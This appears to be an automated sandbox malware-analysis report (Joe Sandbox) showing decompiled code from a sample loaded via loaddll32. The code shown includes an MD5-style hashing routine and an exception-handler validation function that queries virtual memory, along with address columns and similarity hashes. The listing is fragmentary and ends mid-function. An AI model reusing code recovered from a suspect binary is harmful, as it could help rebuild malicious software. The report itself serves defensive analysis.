                                                  				asm("ror esi, 0xa");
                                                  				_t684 = ( !_t409 & _t229 | _t350 & _t409) + _v64 + _t682 - 0x3e423112 + _t409;
                                                  				_v8 = _t684;
                                                  				_t689 = _v8;
                                                  				asm("rol eax, 0x7");
                                                  				_t231 = ( !_t684 & _t350 | _t409 & _v8) + _v60 + _t229 - 0xa83f051 + _t689;
                                                  				asm("rol ecx, 0xc");
                                                  				_t352 = ( !_t231 & _t409 | _t689 & _t231) + _v56 + _t350 + 0x4787c62a + _t231;
                                                  				asm("ror edx, 0xf");
                                                  				_t411 = ( !_t352 & _t689 | _t352 & _t231) + _v52 + _t409 - 0x57cfb9ed + _t352;
                                                  				asm("ror esi, 0xa");
                                                  				_t691 = ( !_t411 & _t231 | _t352 & _t411) + _v48 + _t689 - 0x2b96aff + _t411;
                                                  				_v8 = _t691;
                                                  				_t696 = _v8;
                                                  				asm("rol eax, 0x7");
                                                  				_t233 = ( !_t691 & _t352 | _t411 & _v8) + _v44 + _t231 + 0x698098d8 + _t696;
                                                  				asm("rol ecx, 0xc");
                                                  				_t354 = ( !_t233 & _t411 | _t696 & _t233) + _v40 + _t352 - 0x74bb0851 + _t233;
                                                  				asm("ror edx, 0xf");
                                                  				_t413 = ( !_t354 & _t696 | _t354 & _t233) + _v36 + _t411 - 0xa44f + _t354;
                                                  				asm("ror esi, 0xa");
                                                  				_t698 = ( !_t413 & _t233 | _t354 & _t413) + _v32 + _t696 - 0x76a32842 + _t413;
                                                  				_v8 = _t698;
                                                  				asm("rol eax, 0x7");
                                                  				_t235 = ( !_t698 & _t354 | _t413 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
                                                  				asm("rol ecx, 0xc");
                                                  				_t356 = ( !_t235 & _t413 | _v8 & _t235) + _v24 + _t354 - 0x2678e6d + _t235;
                                                  				_t507 =  !_t356;
                                                  				asm("ror edx, 0xf");
                                                  				_t415 = (_t507 & _v8 | _t356 & _t235) + _v20 + _t413 - 0x5986bc72 + _t356;
                                                  				_v12 = _t415;
                                                  				_v12 =  !_v12;
                                                  				asm("ror esi, 0xa");
                                                  				_t717 = (_v12 & _t235 | _t356 & _t415) + _v16 + _v8 + 0x49b40821 + _t415;
                                                  				asm("rol eax, 0x5");
                                                  				_t237 = (_t507 & _t415 | _t356 & _t717) + _v72 + _t235 - 0x9e1da9e + _t717;
                                                  				asm("rol ecx, 0x9");
                                                  				_t358 = (_v12 & _t717 | _t415 & _t237) + _v52 + _t356 - 0x3fbf4cc0 + _t237;
                                                  				asm("rol edx, 0xe");
                                                  				_t417 = ( !_t717 & _t237 | _t358 & _t717) + _v32 + _t415 + 0x265e5a51 + _t358;
                                                  				asm("ror esi, 0xc");
                                                  				_t719 = ( !_t237 & _t358 | _t417 & _t237) + _v76 + _t717 - 0x16493856 + _t417;
                                                  				asm("rol eax, 0x5");
                                                  				_t239 = ( !_t358 & _t417 | _t358 & _t719) + _v56 + _t237 - 0x29d0efa3 + _t719;
                                                  				asm("rol ecx, 0x9");
                                                  				_t360 = ( !_t417 & _t719 | _t417 & _t239) + _v36 + _t358 + 0x2441453 + _t239;
                                                  				asm("rol edx, 0xe");
                                                  				_t419 = ( !_t719 & _t239 | _t360 & _t719) + _v16 + _t417 - 0x275e197f + _t360;
                                                  				asm("ror esi, 0xc");
                                                  				_t721 = ( !_t239 & _t360 | _t419 & _t239) + _v60 + _t719 - 0x182c0438 + _t419;
                                                  				asm("rol eax, 0x5");
                                                  				_t241 = ( !_t360 & _t419 | _t360 & _t721) + _v40 + _t239 + 0x21e1cde6 + _t721;
                                                  				asm("rol ecx, 0x9");
                                                  				_t362 = ( !_t419 & _t721 | _t419 & _t241) + _v20 + _t360 - 0x3cc8f82a + _t241;
                                                  				asm("rol edx, 0xe");
                                                  				_t421 = ( !_t721 & _t241 | _t362 & _t721) + _v64 + _t419 - 0xb2af279 + _t362;
                                                  				asm("ror esi, 0xc");
                                                  				_t723 = ( !_t241 & _t362 | _t421 & _t241) + _v44 + _t721 + 0x455a14ed + _t421;
                                                  				asm("rol eax, 0x5");
                                                  				_t243 = ( !_t362 & _t421 | _t362 & _t723) + _v24 + _t241 - 0x561c16fb + _t723;
                                                  				asm("rol ecx, 0x9");
                                                  				_t364 = ( !_t421 & _t723 | _t421 & _t243) + _v68 + _t362 - 0x3105c08 + _t243;
                                                  				asm("rol edx, 0xe");
                                                  				_t423 = ( !_t723 & _t243 | _t364 & _t723) + _v48 + _t421 + 0x676f02d9 + _t364;
                                                  				asm("ror esi, 0xc");
                                                  				_t725 = ( !_t243 & _t364 | _t423 & _t243) + _v28 + _t723 - 0x72d5b376 + _t423;
                                                  				asm("rol eax, 0x4");
                                                  				_t245 = (_t364 ^ _t423 ^ _t725) + _v56 + _t243 - 0x5c6be + _t725;
                                                  				asm("rol ecx, 0xb");
                                                  				_t366 = (_t423 ^ _t725 ^ _t245) + _v44 + _t364 - 0x788e097f + _t245;
                                                  				asm("rol edx, 0x10");
                                                  				_t425 = (_t366 ^ _t725 ^ _t245) + _v32 + _t423 + 0x6d9d6122 + _t366;
                                                  				_t598 = _t366 ^ _t425;
                                                  				asm("ror esi, 0x9");
                                                  				_t727 = (_t598 ^ _t245) + _v20 + _t725 - 0x21ac7f4 + _t425;
                                                  				asm("rol eax, 0x4");
                                                  				_t247 = (_t598 ^ _t727) + _v72 + _t245 - 0x5b4115bc + _t727;
                                                  				asm("rol edi, 0xb");
                                                  				_t606 = (_t425 ^ _t727 ^ _t247) + _v60 + _t366 + 0x4bdecfa9 + _t247;
                                                  				asm("rol edx, 0x10");
                                                  				_t427 = (_t606 ^ _t727 ^ _t247) + _v48 + _t425 - 0x944b4a0 + _t606;
                                                  				_t337 = _t606 ^ _t427;
                                                  				asm("ror ecx, 0x9");
                                                  				_t375 = (_t337 ^ _t247) + _v36 + _t727 - 0x41404390 + _t427;
                                                  				asm("rol eax, 0x4");
                                                  				_t249 = (_t337 ^ _t375) + _v24 + _t247 + 0x289b7ec6 + _t375;
                                                  				asm("rol esi, 0xb");
                                                  				_t733 = (_t427 ^ _t375 ^ _t249) + _v76 + _t606 - 0x155ed806 + _t249;
                                                  				asm("rol edi, 0x10");
                                                  				_t612 = (_t733 ^ _t375 ^ _t249) + _v64 + _t427 - 0x2b10cf7b + _t733;
                                                  				_t429 = _t733 ^ _t612;
                                                  				asm("ror ecx, 0x9");
                                                  				_t377 = (_t429 ^ _t249) + _v52 + _t375 + 0x4881d05 + _t612;
                                                  				asm("rol eax, 0x4");
                                                  				_t251 = (_t429 ^ _t377) + _v40 + _t249 - 0x262b2fc7 + _t377;
                                                  				asm("rol edx, 0xb");
                                                  				_t437 = (_t612 ^ _t377 ^ _t251) + _v28 + _t733 - 0x1924661b + _t251;
                                                  				asm("rol esi, 0x10");
                                                  				_t739 = (_t437 ^ _t377 ^ _t251) + _v16 + _t612 + 0x1fa27cf8 + _t437;
                                                  				asm("ror ecx, 0x9");
                                                  				_t379 = (_t437 ^ _t739 ^ _t251) + _v68 + _t377 - 0x3b53a99b + _t739;
                                                  				asm("rol eax, 0x6");
                                                  				_t253 = (( !_t437 | _t379) ^ _t739) + _v76 + _t251 - 0xbd6ddbc + _t379;
                                                  				asm("rol edx, 0xa");
                                                  				_t439 = (( !_t739 | _t253) ^ _t379) + _v48 + _t437 + 0x432aff97 + _t253;
                                                  				asm("rol esi, 0xf");
                                                  				_t741 = (( !_t379 | _t439) ^ _t253) + _v20 + _t739 - 0x546bdc59 + _t439;
                                                  				asm("ror ecx, 0xb");
                                                  				_t381 = (( !_t253 | _t741) ^ _t439) + _v56 + _t379 - 0x36c5fc7 + _t741;
                                                  				asm("rol eax, 0x6");
                                                  				_t255 = (( !_t439 | _t381) ^ _t741) + _v28 + _t253 + 0x655b59c3 + _t381;
                                                  				asm("rol edx, 0xa");
                                                  				_t441 = (( !_t741 | _t255) ^ _t381) + _v64 + _t439 - 0x70f3336e + _t255;
                                                  				asm("rol esi, 0xf");
                                                  				_t743 = (( !_t381 | _t441) ^ _t255) + _v36 + _t741 - 0x100b83 + _t441;
                                                  				asm("ror ecx, 0xb");
                                                  				_t383 = (( !_t255 | _t743) ^ _t441) + _v72 + _t381 - 0x7a7ba22f + _t743;
                                                  				asm("rol eax, 0x6");
                                                  				_t257 = (( !_t441 | _t383) ^ _t743) + _v44 + _t255 + 0x6fa87e4f + _t383;
                                                  				asm("rol edx, 0xa");
                                                  				_t443 = (( !_t743 | _t257) ^ _t383) + _v16 + _t441 - 0x1d31920 + _t257;
                                                  				asm("rol esi, 0xf");
                                                  				_t745 = (( !_t383 | _t443) ^ _t257) + _v52 + _t743 - 0x5cfebcec + _t443;
                                                  				asm("ror edi, 0xb");
                                                  				_t678 = (( !_t257 | _t745) ^ _t443) + _v24 + _t383 + 0x4e0811a1 + _t745;
                                                  				asm("rol eax, 0x6");
                                                  				_t259 = (( !_t443 | _t678) ^ _t745) + _v60 + _t257 - 0x8ac817e + _t678;
                                                  				asm("rol edx, 0xa");
                                                  				_t445 = (( !_t745 | _t259) ^ _t678) + _v32 + _t443 - 0x42c50dcb + _t259;
                                                  				_t399 = _a4;
                                                  				asm("rol esi, 0xf");
                                                  				_t747 = (( !_t678 | _t445) ^ _t259) + _v68 + _t745 + 0x2ad7d2bb + _t445;
                                                  				 *_t399 =  *_t399 + _t259;
                                                  				asm("ror eax, 0xb");
                                                  				 *((intOrPtr*)(_t399 + 4)) = (( !_t259 | _t747) ^ _t445) + _v40 + _t678 - 0x14792c6f +  *((intOrPtr*)(_t399 + 4)) + _t747;
                                                  				 *((intOrPtr*)(_t399 + 8)) =  *((intOrPtr*)(_t399 + 8)) + _t747;
                                                  				 *((intOrPtr*)(_t399 + 0xc)) =  *((intOrPtr*)(_t399 + 0xc)) + _t445;
                                                  				return memset( &_v76, 0, 0x40);
                                                  			}

                                                  0x00ec97f5
                                                  0x00ec9800
                                                  0x00ec9803
                                                  0x00ec9806
                                                  0x00ec9807
                                                  0x00ec9807
                                                  0x00ec9812
                                                  0x00ec9823
                                                  0x00ec9825
                                                  0x00ec9828
                                                  0x00ec9828
                                                  0x00ec982b
                                                  0x00ec982b
                                                  0x00ec982e
                                                  0x00ec982e
                                                  0x00ec9831
                                                  0x00ec9831
                                                  0x00ec984e
                                                  0x00ec9851
                                                  0x00ec9867
                                                  0x00ec986a
                                                  0x00ec9884
                                                  0x00ec9887
                                                  0x00ec989d
                                                  0x00ec98a0
                                                  0x00ec98a2
                                                  0x00ec98ba
                                                  0x00ec98bd
                                                  0x00ec98c0
                                                  0x00ec98d8
                                                  0x00ec98db
                                                  0x00ec98f5
                                                  0x00ec98f8
                                                  0x00ec990e
                                                  0x00ec9911
                                                  0x00ec9913
                                                  0x00ec992b
                                                  0x00ec9930
                                                  0x00ec9933
                                                  0x00ec9949
                                                  0x00ec994c
                                                  0x00ec9966
                                                  0x00ec9969
                                                  0x00ec997f
                                                  0x00ec9982
                                                  0x00ec9984
                                                  0x00ec999f
                                                  Instruction addresses (column detached from its C listing by extraction): 0x00ec99a2 through 0x00ec9e95, 114 entries

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                  • Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: memset
                                                  • String ID:
                                                  • API String ID: 2221118986-0
                                                  • Opcode ID: 52e03f73daf1acbc6a4f2a9c02c66ec997d616785c4cba18c714e75c778021e1
                                                  • Instruction ID: 0ec3f77b783fb3f649de73bef97cb6ff7efa7b26aeeedc2eaf939251833ef866
                                                  • Opcode Fuzzy Hash: 52e03f73daf1acbc6a4f2a9c02c66ec997d616785c4cba18c714e75c778021e1
                                                  • Instruction Fuzzy Hash: 6322847BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00ECB341(long _a4) {
                                                  				intOrPtr _v8;
                                                  				intOrPtr _v12;
                                                  				signed int _v16;
                                                  				short* _v32;
                                                  				void _v36;
                                                  				void* _t57;
                                                  				signed int _t58;
                                                  				signed int _t61;
                                                  				signed int _t62;
                                                  				void* _t63;
                                                  				signed int* _t68;
                                                  				intOrPtr* _t69;
                                                  				intOrPtr* _t71;
                                                  				intOrPtr _t72;
                                                  				intOrPtr _t75;
                                                  				void* _t76;
                                                  				signed int _t77;
                                                  				void* _t78;
                                                  				void _t80;
                                                  				signed int _t81;
                                                  				signed int _t84;
                                                  				signed int _t86;
                                                  				short* _t87;
                                                  				void* _t89;
                                                  				signed int* _t90;
                                                  				long _t91;
                                                  				signed int _t93;
                                                  				signed int _t94;
                                                  				signed int _t100;
                                                  				signed int _t102;
                                                  				void* _t104;
                                                  				long _t108;
                                                  				signed int _t110;
                                                  
                                                  				_t108 = _a4;
                                                  				_t76 =  *(_t108 + 8);
                                                  				if((_t76 & 0x00000003) != 0) {
                                                  					L3:
                                                  					return 0;
                                                  				}
                                                  				_a4 =  *[fs:0x4];
                                                  				_v8 =  *[fs:0x8];
                                                  				if(_t76 < _v8 || _t76 >= _a4) {
                                                  					_t102 =  *(_t108 + 0xc);
                                                  					__eflags = _t102 - 0xffffffff;
                                                  					if(_t102 != 0xffffffff) {
                                                  						_t91 = 0;
                                                  						__eflags = 0;
                                                  						_a4 = 0;
                                                  						_t57 = _t76;
                                                  						do {
                                                  							_t80 =  *_t57;
                                                  							__eflags = _t80 - 0xffffffff;
                                                  							if(_t80 == 0xffffffff) {
                                                  								goto L9;
                                                  							}
                                                  							__eflags = _t80 - _t91;
                                                  							if(_t80 >= _t91) {
                                                  								L20:
                                                  								_t63 = 0;
                                                  								L60:
                                                  								return _t63;
                                                  							}
                                                  							L9:
                                                  							__eflags =  *(_t57 + 4);
                                                  							if( *(_t57 + 4) != 0) {
                                                  								_t12 =  &_a4;
                                                  								 *_t12 = _a4 + 1;
                                                  								__eflags =  *_t12;
                                                  							}
                                                  							_t91 = _t91 + 1;
                                                  							_t57 = _t57 + 0xc;
                                                  							__eflags = _t91 - _t102;
                                                  						} while (_t91 <= _t102);
                                                  						__eflags = _a4;
                                                  						if(_a4 == 0) {
                                                  							L15:
                                                  							_t81 =  *0xecd2e0; // 0x0
                                                  							_t110 = _t76 & 0xfffff000;
                                                  							_t58 = 0;
                                                  							__eflags = _t81;
                                                  							if(_t81 <= 0) {
                                                  								L18:
                                                  								_t104 = _t102 | 0xffffffff;
                                                  								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
                                                  								__eflags = _t61;
                                                  								if(_t61 < 0) {
                                                  									_t62 = 0;
                                                  									__eflags = 0;
                                                  								} else {
                                                  									_t62 = _a4;
                                                  								}
                                                  								__eflags = _t62;
                                                  								if(_t62 == 0) {
                                                  									L59:
                                                  									_t63 = _t104;
                                                  									goto L60;
                                                  								} else {
                                                  									__eflags = _v12 - 0x1000000;
                                                  									if(_v12 != 0x1000000) {
                                                  										goto L59;
                                                  									}
                                                  									__eflags = _v16 & 0x000000cc;
                                                  									if((_v16 & 0x000000cc) == 0) {
                                                  										L46:
                                                  										_t63 = 1;
                                                  										 *0xecd328 = 1;
                                                  										__eflags =  *0xecd328;
                                                  										if( *0xecd328 != 0) {
                                                  											goto L60;
                                                  										}
                                                  										_t84 =  *0xecd2e0; // 0x0
                                                  										__eflags = _t84;
                                                  										_t93 = _t84;
                                                  										if(_t84 <= 0) {
                                                  											L51:
                                                  											__eflags = _t93;
                                                  											if(_t93 != 0) {
                                                  												L58:
                                                  												 *0xecd328 = 0;
                                                  												goto L5;
                                                  											}
                                                  											_t77 = 0xf;
                                                  											__eflags = _t84 - _t77;
                                                  											if(_t84 <= _t77) {
                                                  												_t77 = _t84;
                                                  											}
                                                  											_t94 = 0;
                                                  											__eflags = _t77;
                                                  											if(_t77 < 0) {
                                                  												L56:
                                                  												__eflags = _t84 - 0x10;
                                                  												if(_t84 < 0x10) {
                                                  													_t86 = _t84 + 1;
                                                  													__eflags = _t86;
                                                  													 *0xecd2e0 = _t86;
                                                  												}
                                                  												goto L58;
                                                  											} else {
                                                  												do {
                                                  													_t68 = 0xecd2e8 + _t94 * 4;
                                                  													_t94 = _t94 + 1;
                                                  													__eflags = _t94 - _t77;
                                                  													 *_t68 = _t110;
                                                  													_t110 =  *_t68;
                                                  												} while (_t94 <= _t77);
                                                  												goto L56;
                                                  											}
                                                  										}
                                                  										_t69 = 0xecd2e4 + _t84 * 4;
                                                  										while(1) {
                                                  											__eflags =  *_t69 - _t110;
                                                  											if( *_t69 == _t110) {
                                                  												goto L51;
                                                  											}
                                                  											_t93 = _t93 - 1;
                                                  											_t69 = _t69 - 4;
                                                  											__eflags = _t93;
                                                  											if(_t93 > 0) {
                                                  												continue;
                                                  											}
                                                  											goto L51;
                                                  										}
                                                  										goto L51;
                                                  									}
                                                  									_t87 = _v32;
                                                  									__eflags =  *_t87 - 0x5a4d;
                                                  									if( *_t87 != 0x5a4d) {
                                                  										goto L59;
                                                  									}
                                                  									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
                                                  									__eflags =  *_t71 - 0x4550;
                                                  									if( *_t71 != 0x4550) {
                                                  										goto L59;
                                                  									}
                                                  									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
                                                  									if( *((short*)(_t71 + 0x18)) != 0x10b) {
                                                  										goto L59;
                                                  									}
                                                  									_t78 = _t76 - _t87;
                                                  									__eflags =  *((short*)(_t71 + 6));
                                                  									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
                                                  									if( *((short*)(_t71 + 6)) <= 0) {
                                                  										goto L59;
                                                  									}
                                                  									_t72 =  *((intOrPtr*)(_t89 + 0xc));
                                                  									__eflags = _t78 - _t72;
                                                  									if(_t78 < _t72) {
                                                  										goto L46;
                                                  									}
                                                  									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
                                                  									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
                                                  										goto L46;
                                                  									}
                                                  									__eflags =  *(_t89 + 0x27) & 0x00000080;
                                                  									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
                                                  										goto L20;
                                                  									}
                                                  									goto L46;
                                                  								}
                                                  							} else {
                                                  								goto L16;
                                                  							}
                                                  							while(1) {
                                                  								L16:
                                                  								__eflags =  *((intOrPtr*)(0xecd2e8 + _t58 * 4)) - _t110;
                                                  								if( *((intOrPtr*)(0xecd2e8 + _t58 * 4)) == _t110) {
                                                  									break;
                                                  								}
                                                  								_t58 = _t58 + 1;
                                                  								__eflags = _t58 - _t81;
                                                  								if(_t58 < _t81) {
                                                  									continue;
                                                  								}
                                                  								goto L18;
                                                  							}
                                                  							__eflags = _t58;
                                                  							if(_t58 <= 0) {
                                                  								goto L5;
                                                  							}
                                                  							 *0xecd328 = 1;
                                                  							__eflags =  *0xecd328;
                                                  							if( *0xecd328 != 0) {
                                                  								goto L5;
                                                  							}
                                                  							__eflags =  *((intOrPtr*)(0xecd2e8 + _t58 * 4)) - _t110;
                                                  							if( *((intOrPtr*)(0xecd2e8 + _t58 * 4)) == _t110) {
                                                  								L32:
                                                  								_t100 = 0;
                                                  								__eflags = _t58;
                                                  								if(_t58 < 0) {
                                                  									L34:
                                                  									 *0xecd328 = 0;
                                                  									goto L5;
                                                  								} else {
                                                  									goto L33;
                                                  								}
                                                  								do {
                                                  									L33:
                                                  									_t90 = 0xecd2e8 + _t100 * 4;
                                                  									_t100 = _t100 + 1;
                                                  									__eflags = _t100 - _t58;
                                                  									 *_t90 = _t110;
                                                  									_t110 =  *_t90;
                                                  								} while (_t100 <= _t58);
                                                  								goto L34;
                                                  							}
                                                  							_t25 = _t81 - 1; // -1
                                                  							_t58 = _t25;
                                                  							__eflags = _t58;
                                                  							if(_t58 < 0) {
                                                  								L28:
                                                  								__eflags = _t81 - 0x10;
                                                  								if(_t81 < 0x10) {
                                                  									_t81 = _t81 + 1;
                                                  									__eflags = _t81;
                                                  									 *0xecd2e0 = _t81;
                                                  								}
                                                  								_t28 = _t81 - 1; // 0x0
                                                  								_t58 = _t28;
                                                  								goto L32;
                                                  							} else {
                                                  								goto L25;
                                                  							}
                                                  							while(1) {
                                                  								L25:
                                                  								__eflags =  *((intOrPtr*)(0xecd2e8 + _t58 * 4)) - _t110;
                                                  								if( *((intOrPtr*)(0xecd2e8 + _t58 * 4)) == _t110) {
                                                  									break;
                                                  								}
                                                  								_t58 = _t58 - 1;
                                                  								__eflags = _t58;
                                                  								if(_t58 >= 0) {
                                                  									continue;
                                                  								}
                                                  								break;
                                                  							}
                                                  							__eflags = _t58;
                                                  							if(__eflags >= 0) {
                                                  								if(__eflags == 0) {
                                                  									goto L34;
                                                  								}
                                                  								goto L32;
                                                  							}
                                                  							goto L28;
                                                  						}
                                                  						_t75 =  *((intOrPtr*)(_t108 - 8));
                                                  						__eflags = _t75 - _v8;
                                                  						if(_t75 < _v8) {
                                                  							goto L20;
                                                  						}
                                                  						__eflags = _t75 - _t108;
                                                  						if(_t75 >= _t108) {
                                                  							goto L20;
                                                  						}
                                                  						goto L15;
                                                  					}
                                                  					L5:
                                                  					_t63 = 1;
                                                  					goto L60;
                                                  				} else {
                                                  					goto L3;
                                                  				}
                                                  			}

                                                  Instruction addresses for E00ECB341 (column detached from the C listing above by extraction): 0x00ecb34b through 0x00ecb4fc, 76 entries, with 0x00000000 entries as they appear in the original column
                                                  0x00000000
                                                  0x00ecb4fe
                                                  0x00ecb504
                                                  0x00ecb506
                                                  0x00ecb508
                                                  0x00ecb51d
                                                  0x00ecb51d
                                                  0x00ecb51f
                                                  0x00ecb54e
                                                  0x00ecb555
                                                  0x00000000
                                                  0x00ecb555
                                                  0x00ecb523
                                                  0x00ecb524
                                                  0x00ecb526
                                                  0x00ecb528
                                                  0x00ecb528
                                                  0x00ecb52a
                                                  0x00ecb52c
                                                  0x00ecb52e
                                                  0x00ecb542
                                                  0x00ecb542
                                                  0x00ecb545
                                                  0x00ecb547
                                                  0x00ecb547
                                                  0x00ecb548
                                                  0x00ecb548
                                                  0x00000000
                                                  0x00ecb530
                                                  0x00ecb530
                                                  0x00ecb530
                                                  0x00ecb539
                                                  0x00ecb53a
                                                  0x00ecb53c
                                                  0x00ecb53e
                                                  0x00ecb53e
                                                  0x00000000
                                                  0x00ecb530
                                                  0x00ecb52e
                                                  0x00ecb50a
                                                  0x00ecb511
                                                  0x00ecb511
                                                  0x00ecb513
                                                  0x00000000
                                                  0x00000000
                                                  0x00ecb515
                                                  0x00ecb516
                                                  0x00ecb519
                                                  0x00ecb51b
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00ecb51b
                                                  0x00000000
                                                  0x00ecb511
                                                  0x00ecb494
                                                  0x00ecb497
                                                  0x00ecb49c
                                                  0x00000000
                                                  0x00000000
                                                  0x00ecb4a5
                                                  0x00ecb4a7
                                                  0x00ecb4ad
                                                  0x00000000
                                                  0x00000000
                                                  0x00ecb4b3
                                                  0x00ecb4b9
                                                  0x00000000
                                                  0x00000000
                                                  0x00ecb4bf
                                                  0x00ecb4c1
                                                  0x00ecb4ca
                                                  0x00ecb4ce
                                                  0x00000000
                                                  0x00000000
                                                  0x00ecb4d4
                                                  0x00ecb4d7
                                                  0x00ecb4d9
                                                  0x00000000
                                                  0x00000000
                                                  0x00ecb4e0
                                                  0x00ecb4e2
                                                  0x00000000
                                                  0x00000000
                                                  0x00ecb4e4
                                                  0x00ecb4e8
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00ecb4e8
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00ecb3d3
                                                  0x00ecb3d3
                                                  0x00ecb3d3
                                                  0x00ecb3da
                                                  0x00000000
                                                  0x00000000
                                                  0x00ecb3dc
                                                  0x00ecb3dd
                                                  0x00ecb3df
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00ecb3df
                                                  0x00ecb407
                                                  0x00ecb409
                                                  0x00000000
                                                  0x00000000
                                                  0x00ecb419
                                                  0x00ecb41b
                                                  0x00ecb41d
                                                  0x00000000
                                                  0x00000000
                                                  0x00ecb423
                                                  0x00ecb42a
                                                  0x00ecb456
                                                  0x00ecb456
                                                  0x00ecb458
                                                  0x00ecb45a
                                                  0x00ecb46e
                                                  0x00ecb470
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00ecb45c
                                                  0x00ecb45c
                                                  0x00ecb45c
                                                  0x00ecb465
                                                  0x00ecb466
                                                  0x00ecb468
                                                  0x00ecb46a
                                                  0x00ecb46a
                                                  0x00000000
                                                  0x00ecb45c
                                                  0x00ecb42c
                                                  0x00ecb42c
                                                  0x00ecb42f
                                                  0x00ecb431
                                                  0x00ecb443
                                                  0x00ecb443
                                                  0x00ecb446
                                                  0x00ecb448
                                                  0x00ecb448
                                                  0x00ecb449
                                                  0x00ecb449
                                                  0x00ecb44f
                                                  0x00ecb44f
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00ecb433
                                                  0x00ecb433
                                                  0x00ecb433
                                                  0x00ecb43a
                                                  0x00000000
                                                  0x00000000
                                                  0x00ecb43c
                                                  0x00ecb43c
                                                  0x00ecb43d
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00ecb43d
                                                  0x00ecb43f
                                                  0x00ecb441
                                                  0x00ecb454
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00ecb454
                                                  0x00000000
                                                  0x00ecb441
                                                  0x00ecb3b3
                                                  0x00ecb3b6
                                                  0x00ecb3b9
                                                  0x00000000
                                                  0x00000000
                                                  0x00ecb3bb
                                                  0x00ecb3bd
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00ecb3bd
                                                  0x00ecb382
                                                  0x00ecb384
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000

APIs
• NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 00ECB3F2
Memory Dump Source
• Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp
• Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp
• Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp
• Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
Similarity
• API ID: MemoryQueryVirtual
• String ID:
• API String ID: 2850889275-0
• Opcode ID: a28c9dff143175d195219fb7fbdf4fd4d58ed9989d327eaaabd09be6efb45d99
• Instruction ID: 5b7ed0b030aef556b1ec7dfc41843085c69d44e50f34f9db6040964e1beb611b
• Opcode Fuzzy Hash: a28c9dff143175d195219fb7fbdf4fd4d58ed9989d327eaaabd09be6efb45d99
• Instruction Fuzzy Hash: 0261C3306046459FCB2D8E2DCA82F6A73A6FB80319F24A13DD855E7292E373DC478A44
Uniqueness
• Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00402375(long _a4) {
                                                  				intOrPtr _v8;
                                                  				intOrPtr _v12;
                                                  				signed int _v16;
                                                  				short* _v32;
                                                  				void _v36;
                                                  				void* _t57;
                                                  				signed int _t58;
                                                  				signed int _t61;
                                                  				signed int _t62;
                                                  				void* _t63;
                                                  				signed int* _t68;
                                                  				intOrPtr* _t69;
                                                  				intOrPtr* _t71;
                                                  				intOrPtr _t72;
                                                  				intOrPtr _t75;
                                                  				void* _t76;
                                                  				signed int _t77;
                                                  				void* _t78;
                                                  				void _t80;
                                                  				signed int _t81;
                                                  				signed int _t84;
                                                  				signed int _t86;
                                                  				short* _t87;
                                                  				void* _t89;
                                                  				signed int* _t90;
                                                  				long _t91;
                                                  				signed int _t93;
                                                  				signed int _t94;
                                                  				signed int _t100;
                                                  				signed int _t102;
                                                  				void* _t104;
                                                  				long _t108;
                                                  				signed int _t110;
                                                  
                                                  				_t108 = _a4;
                                                  				_t76 =  *(_t108 + 8);
                                                  				if((_t76 & 0x00000003) != 0) {
                                                  					L3:
                                                  					return 0;
                                                  				}
                                                  				_a4 =  *[fs:0x4];
                                                  				_v8 =  *[fs:0x8];
                                                  				if(_t76 < _v8 || _t76 >= _a4) {
                                                  					_t102 =  *(_t108 + 0xc);
                                                  					__eflags = _t102 - 0xffffffff;
                                                  					if(_t102 != 0xffffffff) {
                                                  						_t91 = 0;
                                                  						__eflags = 0;
                                                  						_a4 = 0;
                                                  						_t57 = _t76;
                                                  						do {
                                                  							_t80 =  *_t57;
                                                  							__eflags = _t80 - 0xffffffff;
                                                  							if(_t80 == 0xffffffff) {
                                                  								goto L9;
                                                  							}
                                                  							__eflags = _t80 - _t91;
                                                  							if(_t80 >= _t91) {
                                                  								L20:
                                                  								_t63 = 0;
                                                  								L60:
                                                  								return _t63;
                                                  							}
                                                  							L9:
                                                  							__eflags =  *(_t57 + 4);
                                                  							if( *(_t57 + 4) != 0) {
                                                  								_t12 =  &_a4;
                                                  								 *_t12 = _a4 + 1;
